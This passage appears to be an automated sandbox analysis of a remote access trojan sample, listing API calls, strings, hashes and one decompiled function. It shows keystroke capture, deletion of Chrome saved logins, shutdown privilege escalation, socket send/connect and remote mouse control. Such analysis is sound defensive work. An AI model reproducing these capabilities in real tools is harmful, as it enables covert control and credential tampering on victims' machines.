                                    • _free.LIBCMT ref: 00713087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID: ~0q$~0q
                                    • API String ID: 314583886-1753788592
                                    • Opcode ID: 493ba080b7ebd49a3a8fdd447981060614f66e173abbfb8db324d65cc3e7f03d
                                    • Instruction ID: 6d044efc3e0a4172701fa80ebee8594c29178043ac80cb5666096ac250c49ad9
                                    • Opcode Fuzzy Hash: 493ba080b7ebd49a3a8fdd447981060614f66e173abbfb8db324d65cc3e7f03d
                                    • Instruction Fuzzy Hash: 37C10671A00209EFDB209F6CDC45AEABBB9EF45310F14419AE584972D3E7388E978B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E006E4F84(signed int __edx, void* __eflags, char _a8) {
                                    				void* _v28;
                                    				char _v32;
                                    				void* _v36;
                                    				void* _v40;
                                    				char _v44;
                                    				char _v48;
                                    				intOrPtr* _t60;
                                    				intOrPtr* _t65;
                                    				intOrPtr* _t67;
                                    				intOrPtr* _t72;
                                    				intOrPtr* _t74;
                                    				char* _t79;
                                    				char* _t80;
                                    				char* _t81;
                                    				intOrPtr* _t82;
                                    				intOrPtr* _t85;
                                    				intOrPtr _t90;
                                    				signed int _t101;
                                    				signed int _t109;
                                    				signed int _t118;
                                    				signed int _t136;
                                    
                                    				_t136 = __edx;
                                    				_t90 =  *((intOrPtr*)(E006D5220(0)));
                                    				E006D42A6( &_a8,  &_v32, 1, 0xffffffff);
                                    				if(_t90 != 0x30) {
                                    					__eflags = _t90 - 0x31;
                                    					if(_t90 != 0x31) {
                                    						__eflags = _t90 - 0x32;
                                    						if(_t90 != 0x32) {
                                    							__eflags = _t90 - 0x33;
                                    							if(_t90 != 0x33) {
                                    								__eflags = _t90 - 0x34;
                                    								if(_t90 != 0x34) {
                                    									__eflags = _t90 - 0x35;
                                    									if(_t90 != 0x35) {
                                    										__eflags = _t90 - 0x36;
                                    										if(_t90 == 0x36) {
                                    											_push(0);
                                    											_push(0x78);
                                    											goto L15;
                                    										}
                                    									} else {
                                    										_push(0);
                                    										_push(0xffffff88);
                                    										L15:
                                    										mouse_event(0x800, 0, 0, ??, ??);
                                    									}
                                    								} else {
                                    									_v40 =  *((intOrPtr*)(E006D5220(0)));
                                    									_t60 = E006D5220(4);
                                    									_t101 =  *0x73bd74; // 0x0
                                    									_v40 =  *_t60;
                                    									E006E4E1E( *((intOrPtr*)(0x73bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
                                    									E006E5250(_v44, _v40);
                                    								}
                                    							} else {
                                    								_t65 = E006D5220(0);
                                    								_v44 =  *((intOrPtr*)(E006D5220(4)));
                                    								_t67 = E006D5220(8);
                                    								_t109 =  *0x73bd74; // 0x0
                                    								_v44 =  *_t67;
                                    								E006E4E1E( *((intOrPtr*)(0x73bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
                                    								E006E51F4( *_t65, _v48, _v44);
                                    								goto L8;
                                    							}
                                    						} else {
                                    							_t72 = E006D5220(0);
                                    							_v40 =  *((intOrPtr*)(E006D5220(4)));
                                    							_t74 = E006D5220(8);
                                    							_t118 =  *0x73bd74; // 0x0
                                    							_v48 =  *_t74;
                                    							E006E4E1E( *((intOrPtr*)(0x73bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
                                    							E006E5198( *_t72, _v44, _v48);
                                    							goto L8;
                                    						}
                                    					} else {
                                    						_t79 = E006D5220(4);
                                    						_t80 = E006D5220(3);
                                    						_t81 = E006D5220(2);
                                    						_t82 = E006D5220(0);
                                    						 *_t79 =  *_t80;
                                    						__eflags =  *_t81;
                                    						E006E5288( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
                                    						goto L8;
                                    					}
                                    				} else {
                                    					E006D5220(0);
                                    					_t85 = E006D5220(1);
                                    					E006E459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E006D5220(2)));
                                    					L8:
                                    				}
                                    				E006D1FC7();
                                    				return E006D1FC7();
                                    			}

                                    APIs
                                    • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 006E4FD8
                                    • mouse_event.USER32 ref: 006E517A
                                      • Part of subcall function 006E4E1E: GetSystemMetrics.USER32 ref: 006E4E53
                                      • Part of subcall function 006E4E1E: GetSystemMetrics.USER32 ref: 006E4E68
                                      • Part of subcall function 006E5250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 006E527C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem$InputSendmouse_event
                                    • String ID: 0$1$2$3$4$5$6
                                    • API String ID: 1731092567-2737206560
                                    • Opcode ID: 51479a093c21d2c53ddbbdd54dbff2bca24094610b9df7163dceeb66eae92752
                                    • Instruction ID: 54a4b1249d26d5edae5822dea949fca76a2e42929321f45e0a4997f27d67656c
                                    • Opcode Fuzzy Hash: 51479a093c21d2c53ddbbdd54dbff2bca24094610b9df7163dceeb66eae92752
                                    • Instruction Fuzzy Hash: 0B51AE74A157419FD714EF20E892B9A77A6EF89310F40490EF593473D1DA30AA0DCB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0073BACC,0073C998), ref: 006E60F2
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,006E5BDC,?), ref: 006E6139
                                    • GetLastError.KERNEL32(?,0073BACC,0073C998), ref: 006E6147
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,006E5BDC,?), ref: 006E6178
                                    • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,007359C4,00000000,007359C4,00000000,007359C4,?,0073BACC,0073C998), ref: 006E6248
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                    • String ID:
                                    • API String ID: 2247270020-0
                                    • Opcode ID: e7f1910964228cafa681e1d42106b10da712081a50ccea6bdad9e05a9e19eac6
                                    • Instruction ID: cdca74bb109347866b30327f1a69394510d435af2df395bb09da674e29540040
                                    • Opcode Fuzzy Hash: e7f1910964228cafa681e1d42106b10da712081a50ccea6bdad9e05a9e19eac6
                                    • Instruction Fuzzy Hash: AE813C71D00159ABCB14EBE0EC96DEEB77AEF24350F10801AF91666291EF746F09CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,0073C238), ref: 006E77EB
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,0073C238), ref: 006E7822
                                    • RemoveDirectoryW.KERNEL32(?,?,?,0073C238), ref: 006E789C
                                    • FindClose.KERNEL32(00000000,?,?,0073C238), ref: 006E78CA
                                    • RemoveDirectoryW.KERNEL32(?,?,?,0073C238), ref: 006E78D3
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,0073C238), ref: 006E78F0
                                    • DeleteFileW.KERNEL32(?,?,?,0073C238), ref: 006E78FD
                                    • GetLastError.KERNEL32(?,?,0073C238), ref: 006E7925
                                    • FindClose.KERNEL32(00000000,?,?,0073C238), ref: 006E7938
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 2b13fce96163c89ee04adefccb841daa720a63ecc76f8753903e954fe767f27a
                                    • Instruction ID: 93f8f0d7464886d66c7bed0485ec304c6bb9aedcdb836d0263587fdc31152303
                                    • Opcode Fuzzy Hash: 2b13fce96163c89ee04adefccb841daa720a63ecc76f8753903e954fe767f27a
                                    • Instruction Fuzzy Hash: DC51183450539A8ACF34DF69C8886FAB3B6BF54304F5081ADD84993251FB355E87CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 006E12DA
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 006E12E6
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 006E15C7
                                    • GetProcAddress.KERNEL32(00000000), ref: 006E15CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: d3778eda6449d1dbdbc26860f52795b99df4e930561e31e8aec3c7bc4bcebea9
                                    • Instruction ID: a29cbad5585528cb4df79429224e580b980d7cf0415c67be13e6ced91d5a1c10
                                    • Opcode Fuzzy Hash: d3778eda6449d1dbdbc26860f52795b99df4e930561e31e8aec3c7bc4bcebea9
                                    • Instruction Fuzzy Hash: A9E1A572E0430067CA94BBB58C6797E77AB5F96700F40051EF942AF3D3EE758A0487A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E3958: GetCurrentProcess.KERNEL32(00000028,?), ref: 006E3965
                                      • Part of subcall function 006E3958: OpenProcessToken.ADVAPI32(00000000), ref: 006E396C
                                      • Part of subcall function 006E3958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 006E397E
                                      • Part of subcall function 006E3958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 006E399D
                                      • Part of subcall function 006E3958: GetLastError.KERNEL32 ref: 006E39A3
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 006E2C83
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 006E2C98
                                    • GetProcAddress.KERNEL32(00000000), ref: 006E2C9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: 8Em$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-3192512550
                                    • Opcode ID: 82fd8d315e980de0ee51e55ee54bccdb49a5f3afb60916efa99cf53656f84eef
                                    • Instruction ID: cc8ff5b3fa9799e29be7e136576cee55b5999a039840f34009e5d75cf45a603b
                                    • Opcode Fuzzy Hash: 82fd8d315e980de0ee51e55ee54bccdb49a5f3afb60916efa99cf53656f84eef
                                    • Instruction Fuzzy Hash: 3E21AC60E04351A7CB94FBF198669AE638F9B45700F14092EB5425F3C3DEB8CD058265
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 006D9F30
                                    • GetLastError.KERNEL32 ref: 006D9F3A
                                    Strings
                                    • UserProfile, xrefs: 006D9F00
                                    • [Chrome StoredLogins found, cleared!], xrefs: 006D9F60
                                    • [Chrome StoredLogins not found], xrefs: 006D9F54
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 006D9EFB
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: e2ff3386cae99619f3c46963b47319da64ef0d749544b1ca4bfeff961d877cd4
                                    • Instruction ID: 901350741c8ce888c9f8d9cabf07b28129194a3df5f06f6c093b0b8428053f14
                                    • Opcode Fuzzy Hash: e2ff3386cae99619f3c46963b47319da64ef0d749544b1ca4bfeff961d877cd4
                                    • Instruction Fuzzy Hash: A801F971F80109AB8A48B7B4ED5B8FE7766A912300740022FF406963D2FE554A45C6E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 006E3965
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 006E396C
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 006E397E
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 006E399D
                                    • GetLastError.KERNEL32 ref: 006E39A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 9ae4611fad492f8565a08bd3aaf97e8cdb2aa408b2b79e1792e40208bad7b246
                                    • Instruction ID: d22d5c6133e768f0664780c714a4204bd9f7e8db4f4fe3fba1c4daf12c279be3
                                    • Opcode Fuzzy Hash: 9ae4611fad492f8565a08bd3aaf97e8cdb2aa408b2b79e1792e40208bad7b246
                                    • Instruction Fuzzy Hash: 91F034B1902129ABEB20ABA0ED0DEEFBFBCEF05711F104054B909A1050D63C4B05CAB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 006D77F1
                                      • Part of subcall function 006D4A08: connect.WS2_32(?,0073DBA0,00000010), ref: 006D4A23
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006D789E
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 006D78FC
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006D7954
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 006D796B
                                      • Part of subcall function 006D4E0B: closesocket.WS2_32(?), ref: 006D4E11
                                    • FindClose.KERNEL32(00000000), ref: 006D7BA9
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                                    • String ID:
                                    • API String ID: 2104358809-0
                                    • Opcode ID: 5b64e61390a8c4c46fc41ec1a9db207dbcdc693e27fa2f9c7239eca5f3607038
                                    • Instruction ID: 763d590ecb7486e9a8ed1f686396303f9dee23cf1fab10a54a6e9016f802ff9b
                                    • Opcode Fuzzy Hash: 5b64e61390a8c4c46fc41ec1a9db207dbcdc693e27fa2f9c7239eca5f3607038
                                    • Instruction Fuzzy Hash: 6AC18032D041099BCB54EB60DC92AEDB377AF21310F50416FE816AB292EF345F49CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?,00000000), ref: 006D89EE
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 006D89F9
                                    • GetKeyboardLayout.USER32(00000000), ref: 006D8A00
                                    • GetKeyState.USER32(00000010), ref: 006D8A0A
                                    • GetKeyboardState.USER32(?), ref: 006D8A17
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 006D8A33
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                    • String ID:
                                    • API String ID: 3566172867-0
                                    • Opcode ID: 8b5d2bd8208ebb86c830cd9ce3b7cb6987b551869880db3b17cf28eab5d57b87
                                    • Instruction ID: 21a94e68a707af27fe831e3f4583d43a210eb83ab05151937b2937f59ad2ad6c
                                    • Opcode Fuzzy Hash: 8b5d2bd8208ebb86c830cd9ce3b7cb6987b551869880db3b17cf28eab5d57b87
                                    • Instruction Fuzzy Hash: 0D11127290020CBBDB10DBE4DC49FEA7BBCEB0C741F104455FA04E6191DA79AF558BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006E0885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 006E08A5
                                      • Part of subcall function 006E0885: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 006E08C3
                                      • Part of subcall function 006E0885: RegCloseKey.ADVAPI32(?), ref: 006E08CE
                                    • Sleep.KERNEL32(00000BB8), ref: 006DD169
                                    • ExitProcess.KERNEL32 ref: 006DD1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 3.2.1 Pro$override$pth_unenc
                                    • API String ID: 2281282204-2083519672
                                    • Opcode ID: 41c8b4028211eec73bfbe31592068e23f83bf734a93b6d79986fcb5d48d1d8f5
                                    • Instruction ID: 7506732f099edf6cd01bc9ac4f0adde27f272f8cabbb1f5eeded703b5ab99590
                                    • Opcode Fuzzy Hash: 41c8b4028211eec73bfbe31592068e23f83bf734a93b6d79986fcb5d48d1d8f5
                                    • Instruction Fuzzy Hash: A221F471F443407BEA88B6B94C27A6E3297AB85700F40041DB8019B3C7FDAA9A1187DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0071A9DB,?,00000000), ref: 0071A755
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0071A9DB,?,00000000), ref: 0071A77E
                                    • GetACP.KERNEL32(?,?,0071A9DB,?,00000000), ref: 0071A793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: 8829127069829674c66c8ddf23018c8e2cb7a1a868980baef454955ca464a08c
                                    • Instruction ID: 0934ebd3b95233820b9b14ce89bfb7d575979d647b1e2088d9ab0df69c7afbc4
                                    • Opcode Fuzzy Hash: 8829127069829674c66c8ddf23018c8e2cb7a1a868980baef454955ca464a08c
                                    • Instruction Fuzzy Hash: C021A735602205B6E7318F2CC901AE773B6AF54B64B568424E909D71D1E73ADFC1C391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 006E6C4A
                                    • LoadResource.KERNEL32(00000000,?,?,?,006DCC70), ref: 006E6C5E
                                    • LockResource.KERNEL32(00000000,?,?,?,006DCC70), ref: 006E6C65
                                    • SizeofResource.KERNEL32(00000000,?,?,?,006DCC70), ref: 006E6C74
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: 8ea07559b9d574461e87728985cdeb94ae6b2e263848d839edb6475440feb15d
                                    • Instruction ID: 3788c5dae44820f3ab19f11992342beb488982d3efb1ecfb3ffe51526eedb4e7
                                    • Opcode Fuzzy Hash: 8ea07559b9d574461e87728985cdeb94ae6b2e263848d839edb6475440feb15d
                                    • Instruction Fuzzy Hash: 33E01A76700798ABE7311BA5AC4CD163E79EFCAB637008025F60186220D73E8861DB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 006D7C5A
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 006D7CD2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006D7CFB
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 006D7D12
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                    • String ID:
                                    • API String ID: 3260228402-0
                                    • Opcode ID: 306ba57029b87dfe421f8076bd4442542e06fbb4eab07e96eedde3c54f7ba598
                                    • Instruction ID: cbf8516d5b619695f1c5ed23c89389515d71925e20d61e08906160760c4ca344
                                    • Opcode Fuzzy Hash: 306ba57029b87dfe421f8076bd4442542e06fbb4eab07e96eedde3c54f7ba598
                                    • Instruction Fuzzy Hash: 7A916F32D041199BCB55EBA0DC929EDB37BAF21340F14426FE806AB291EF309F45CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00711CE2: GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D19
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                      • Part of subcall function 00711CE2: _abort.LIBCMT ref: 00711D60
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D41
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D4E
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0071A99C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 0071A9F7
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0071AA06
                                    • GetLocaleInfoW.KERNEL32(?,00001001,0070E2C1,00000040,?,0070E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0071AA4E
                                    • GetLocaleInfoW.KERNEL32(?,00001002,0070E341,00000040), ref: 0071AA6D
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID:
                                    • API String ID: 745075371-0
                                    • Opcode ID: bc72af64490d69a1db526f524c955ce0dc1d62fc58e4109737ed87ec9732a970
                                    • Instruction ID: ddaa735aeba51d9f6e488683813c7aeb5910ddff56bc252ee399d77e5d6b384b
                                    • Opcode Fuzzy Hash: bc72af64490d69a1db526f524c955ce0dc1d62fc58e4109737ed87ec9732a970
                                    • Instruction Fuzzy Hash: 33515171901209BBDB20DFA9CC45AFE77B8BF44700F154465E954E71D0D778AAC0CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: gq$gq
                                    • API String ID: 0-3320374895
                                    • Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                                    • Instruction ID: 557bce826c6048aae8f2da4e598ce5a3e6608e6b8b48214b3f4d82ab5584a33c
                                    • Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                                    • Instruction Fuzzy Hash: C8023D71E00219DFDF24CFA9C8906AEB7F1FF88314F25826AD819E7781D734A9418B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 006E8005
                                      • Part of subcall function 006E0AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 006E0AB6
                                      • Part of subcall function 006E0AA7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,006E0CCD,?,00000000), ref: 006E0ADE
                                      • Part of subcall function 006E0AA7: RegCloseKey.ADVAPI32(00000000,?,?,?,006E0CCD,?,00000000), ref: 006E0AE9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: b78181150bf0b53a9685405e90f023100db67670482a569c8a46d8b1b14cc4b3
                                    • Instruction ID: 7322765c2da0426427ed23a6b5379ddab6c2c6372a4b564ab54f4693267bdc7e
                                    • Opcode Fuzzy Hash: b78181150bf0b53a9685405e90f023100db67670482a569c8a46d8b1b14cc4b3
                                    • Instruction Fuzzy Hash: 5B117262B8579673F918303E4D67FAE2827D756B64F600178F6022F7C6E8CB4A4142E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00711CE2: GetLastError.KERNEL32(00000000,?,00705545,?,?,?,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711CE6
                                      • Part of subcall function 00711CE2: _free.LIBCMT ref: 00711D19
                                      • Part of subcall function 00711CE2: SetLastError.KERNEL32(00000000,00709965,?,006F8E1A,00000000,?,00000000,?,?,006F8E1A), ref: 00711D5A
                                      • Part of subcall function 00711CE2: _abort.LIBCMT ref: 00711D60
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0070E2C8,?,?,?,?,0070DD1F,?,00000004), ref: 0071A03A
                                    • _wcschr.LIBVCRUNTIME ref: 0071A0CA
                                    • _wcschr.LIBVCRUNTIME ref: 0071A0D8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0070E2C8,00000000,0070E3E8), ref: 0071A17B
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID:
                                    • API String ID: 4212172061-0
                                    • Opcode ID: 4554fbd6b02628724a554097ff846e5945bbd5ad19e9c2ec1ecb9241ed0ff899
                                    • Instruction ID: 56b0a3ba0ce87e5384146740df6b74e5ecc6070ba3cc7bf430b23a06ff391131
                                    • Opcode Fuzzy Hash: 4554fbd6b02628724a554097ff846e5945bbd5ad19e9c2ec1ecb9241ed0ff899
                                    • Instruction Fuzzy Hash: F761D772601706FAD724AB78CC9AAE673ACEF04710F14442AFA05D71C1EB7CE986D761
